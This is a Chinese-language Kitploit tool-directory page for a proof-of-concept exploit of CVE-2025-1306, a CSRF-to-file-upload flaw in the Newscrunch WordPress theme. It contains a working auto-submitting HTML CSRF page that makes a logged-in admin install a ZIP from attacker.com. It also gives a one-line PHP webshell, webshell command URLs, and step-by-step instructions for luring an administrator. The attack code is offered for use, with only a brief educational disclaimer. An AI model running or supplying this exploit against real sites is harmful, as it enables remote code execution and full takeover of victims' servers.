Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - 跨站请求伪造导致任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-1306
钓鱼工具Payload生成漏洞利用Web应用程序漏洞利用学习与教育
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - 跨站请求伪造导致任意文件上传

查看仓库
531年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Newscrunch 漏洞利用 (CVE-2025-1306)

🚨 概述

此漏洞利用针对 Newscrunch WordPress 主题中的跨站请求伪造 (CSRF) 导致任意文件上传漏洞 (CVE-2025-1306)。由于 newscrunch_install_and_activate_plugin() 函数缺少 nonce 验证,未经认证的攻击者可以诱骗已登录的管理员将任意文件上传到服务器,从而导致远程代码执行 (RCE)。


🔥 漏洞详情

  • CVE ID: CVE-2025-1306
  • 受影响软件: Newscrunch WordPress 主题 (<= 1.8.4)
  • CWE 分类: CWE-352 - 跨站请求伪造 (CSRF)
  • CVSS 评分: 8.8 (高危)
  • 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • 发布日期: 2025年3月4日

🛑 严重程度与影响

  • ✅ 远程代码执行 (RCE)
  • ✅ 完全系统入侵
  • ✅ 基于 CSRF 的任意文件上传
  • ✅ 未经认证的攻击向量

可利用性: 需要管理员访问精心构造的恶意链接。


📜 漏洞利用代码

此漏洞利用强制已认证的管理员执行CSRF 攻击,上传包含 webshell 的恶意 ZIP 文件。

🔹 PoC - HTML 漏洞利用

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 请替换:

  • http://target.com/ 为易受攻击的 WordPress 站点
  • http://attacker.com/shell.zip 为包含 webshell 的恶意 ZIP 有效载荷

🔹 恶意 PHP Webshell 示例

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 成功利用后,访问 webshell:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 使用方法

  1. 在攻击者控制的网站上托管 HTML 文件。
  2. 将恶意链接发送给已认证的 WordPress 管理员。
  3. 一旦管理员访问该页面,webshell 将自动上传。
  4. 远程执行命令,使用:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ 免责声明

此工具仅用于教育和安全研究目的。 未经授权利用漏洞是违法的,并会受到法律制裁。作者对此工具造成的任何滥用或损害概不负责。请负责任地使用。


下载工具